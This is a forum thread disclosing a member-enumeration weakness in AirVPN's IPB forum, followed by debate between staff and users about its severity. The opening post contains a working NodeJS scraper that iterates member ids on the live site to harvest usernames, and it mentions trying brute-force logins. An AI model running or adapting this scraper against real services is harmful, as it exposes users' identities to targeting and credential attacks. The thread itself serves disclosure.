Guest Posted ... Over the last several weeks I've reported some potential issues for the AirVPN team to investigate. All issues relate to their use of the current forum software, IPB V3. Today, I am disclosing the first potential issue for the communities consideration. The staff have a security policy which this issue was not considered under. Disclosure details: Reported: 15th Feb 2019 12:45PM First reply by Clodo: 15th Feb 2019 13:04PMDisclosure reply by myself: 15th Feb 2019 13:17PM (this reply contained the POC)Second reply by Clodo: 15th Feb 2019 13:34PM Reply asking for update: 19th Feb 2019 14:15PMStaff reply: 19th Feb 2019 16:09PM Disclosure information (taken directly from the ticket): Details: Using your forum, it's possible to enumerate all users on your platform and track them based on their activity. This also allows somebody to maintain a list of every valid user account. This could be useful for brute-force attempts, such as trying each valid username with 'generic' passwords. How: When you hover over a user on the forum, IPB makes a request to the following URL:https://airvpn.org/index.php?s=[sESSION]&&app=members&module=ajax&secure_key=[KEY]§ion=card&mid=63Using this, we can build a PoC (below) to go through every "mid" from 0 to the latest (which is about 453,745). POC. NodeJS: const fs = require("fs"); const fetch = require('node-fetch'); const cheerio = require('cheerio'); const argv = require('minimist')(process.argv.slice(2)); const config = { base: "https://airvpn.org/index.php", s: "?s=[SESSION KEY]", app: "&app=members", module: "&module=ajax", secure_key:"&secure_key=[KEY HERE]", section: "§ion=card", cache_dir: "./data/", cache_exists_dir: "./data-user-exists/" } let mid = 0; function cacheData(dir, mid, data) { console.log("Caching data..."); fs.writeFile(dir + mid + ".json", JSON.stringify(data), () => {}); } async function fetchData(url) { console.log("Fetching data..."); let res = await fetch(url) .then(res => res.text()) .then(body => {return body;}) let exists = true; if(res == "error") { exists = false; } let data = { "user_id": mid, "user_exists": exists, "html_file": mid + "-html.json", "data_file": mid + "-data.json", "user_data": null } if(res != "error") { let c = cheerio.load(res); let userData = { username: c(".nickname").text(), url: c(".ipsUserPhotoLink").attr("href") } data.user_data = JSON.stringify(userData); await cacheData(config.cache_exists_dir, mid + "-html", res); await cacheData(config.cache_exists_dir, mid + "-data", data); } await cacheData(config.cache_dir, mid + "-html", res); await cacheData(config.cache_dir, mid + "-data", data); } async function start() { console.log("Starting..."); if(argv.end && mid > argv.end) { console.log("Ending..."); return; } console.log("MID: ", mid); let url = config.base + config.s + config.app + config.module + config.secure_key + config.section + "&mid=" + mid; await fetchData(url); mid++; start(); } function boot() { if(argv.start) { mid = argv.start; } start().catch(e => console.log); } boot(); //other URL: //https://airvpn.org/index.php?app=core&module=search&do=user_activity&search_app=forums&mid=66&userMode=all&sid=[SID] Staff reply:Hello!Since we have ascertained that this is the default, expected behavior of IPB, please consider to send your vulnerability disclosure to Invision team. This does not mean anyway that we may change this behavior, if possible, in the infrastructure next update. We also have a plan for 2FA for late 2019. Should you need additional replies from the developers, please do not hesitate to reply and the ticket will re-open automatically.Kind regardsAirVPN Support Team My reply: Thanks for getting back to me.I am not so certain how username enumeration isn't a bigger issue, especially for a VPN service.I can find out how many members you have, which groups they belong to, when they were last active, and use that information to potentially target those particular accounts.This behavior is undesirable at best and my PoC demonstrated how trivially easy it is to collect that information.So far, I'm at 250,000 users and will have a complete list soon. Considering you do not have 2FA to this day (and have not for years), it is not certain if this has been abused before in being used to send automated login requests using known passwords. This can also be used to collect usernames and cross reference them in other datasets you can find across the internet for targeting.Again, if I wanted to keep my username secret this is no longer possible.Also, I noticed there is a group called "members2", on the surface it would appear this is a collection of all premium users, but I can't verify that for sure just yet.This feature should be disabled on your forum and I should be credited for demonstrating how easy it has been to collect this information. It may not seem significant, but if it's not a big deal maybe I can publish this on your forums? I want to disclose this anyway as is the right thing to do.Thanks. My main concern with this, is that it's possible to collect a list of usernames, order them by when they were last active, and potentially use that as an attack vector, such as brute force attempts. Although, to AirVPN's credit, brute forcing is limited. I tried and after a few incorrect attempts the IP was blacklisted. Although this could be used to DOS the IP (such as AirVPN's own IPs) to prevent users login, it's a good security measure to prevent such attacks. 1 83jd0whx38ns reacted to this Quote Share this post Link to post
zhang888 1066 Posted ... Note that brute force is not considered as a vulnerability nor an attack vector on any platform or bug bounty program.Brute forcing is limited as a counter measure against annoying bots, not as an "anti hacking" mechanism.A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium usersin order to gain something from this attack.But, even compromising a premium user will only allow you:1) Downloading the users config in order to use the 5 connection slots2) Post on the forums on their behalf3) View their support tickets, if any Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will bea hacked premium account Which is quite an effort for a few Euros. Quote Hide zhang888's signature Hide all signatures Occasional moderator, sometimes BOFH. Opinions are my own, except when my wife disagrees. Share this post Link to post
Guest Posted ... Note that brute force is not considered as a vulnerability nor an attack vector on any platform or bug bounty program.Brute forcing is limited as a counter measure against annoying bots, not as an "anti hacking" mechanism.A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium usersin order to gain something from this attack.But, even compromising a premium user will only allow you:1) Downloading the users config in order to use the 5 connection slots2) Post on the forums on their behalf3) View their support tickets, if any Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will bea hacked premium account Which is quite an effort for a few Euros. Magic work is privacy and has nothing to do with the few $ account that you will get. If I get access to an account I can go enable sessions archive and then I assume you will not be so happy.A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform. It's a flawed system. You can't have the same accounts on a forum and the service especially when it's paid and for privacy-conscious people. They should give the ability to all users to separate themselves from a forum account.Second, having no step authentication (coming end of 2019 they said) makes the problem even worse. Quote Share this post Link to post
zhang888 1066 Posted ... The session archive is only useful when you know which user to target specifically.Which by then turns it into a classic brute force attack, even when you know which username to brute force.I do agree that the problem is more severe in case users choose to use their personal email as the forum display name,since then it does reveal a personal detail to the public and to the search engines. A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform. Consider it like this - when you have a public forum, no matter which (IPB,vBulletin,PhpBB,SMF),you will be able to see all the member list (logins). This is just how forums work Quote Hide zhang888's signature Hide all signatures Occasional moderator, sometimes BOFH. Opinions are my own, except when my wife disagrees. Share this post Link to post
Flx 76 Posted ... They should give the ability to all users to separate themselves from a forum account.From a website design perspective. "Signin" and "Sign into Forums" would be a better way of addressing this.which then would have totally different functions.purpose, level of access and do not relate to each other.Suggestion: Move Forums button next to Signin and make it as a separate login. Quote Hide Flx's signature Hide all signatures Guide - EMBY Block ALL interfaces except tap/vpn Windows OS - Configuring your operating system Windows OS - Multi Session/Tunnel Share this post Link to post
Guest Posted ... The session archive is only useful when you know which user to target specifically.Which by then turns it into a classic brute force attack, even when you know which username to brute force.I do agree that the problem is more severe in case users choose to use their personal email as the forum display name,since then it does reveal a personal detail to the public and to the search engines. A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform. Consider it like this - when you have a public forum, no matter which (IPB,vBulletin,PhpBB,SMF),you will be able to see all the member list (logins). This is just how forums work Tell me a paid service based on a forum account. I am not debating how forums work so stop acting like this is what I am implying. Guessing account owner in some cases is not as hard as you may think with enough info on the user. There are multiple ways to reduce a pool of users. Quote Share this post Link to post
Guest Posted ... I've also found another, far more effective way of potentially brute forcing accounts which has been reported to the staff. AirVPN is the only provider I know that makes this enumeration technique possible. Normally, getting access to an account shouldn't matter, but AirVPN's forum logs more than most providers, such as a session archive, connected sessions, when each key/device was last active, any payment information saved on the account, invoices and everything that can be found inside the client area. This behavior is undesirable at best, and the brute forcing should at least be limited (maybe 3 incorrect login attempts) like most other sites on the internet. But mainly, AirVPN doesn't tell you about your account security: there's no 'recent logins', or any way to know if somebody has access to your account. I guess each individual is responsible for their own security, but some monitoring is also appreciated. Quote Share this post Link to post
Staff 9972 Posted ... Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us. Kind regards Quote Share this post Link to post
Guest Posted ... Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us. Kind regardsThis is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting, it's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users. 1 83jd0whx38ns reacted to this Quote Share this post Link to post
83jd0whx38ns 0 Posted ... as an AirVPN user I'd say that this should be addressed ASAP.. Quote Share this post Link to post
Staff 9972 Posted ... This is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting, it's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users. Hello! Good to hear that no vulnerability has surfaced and no exploit is available. Kind regards Quote Share this post Link to post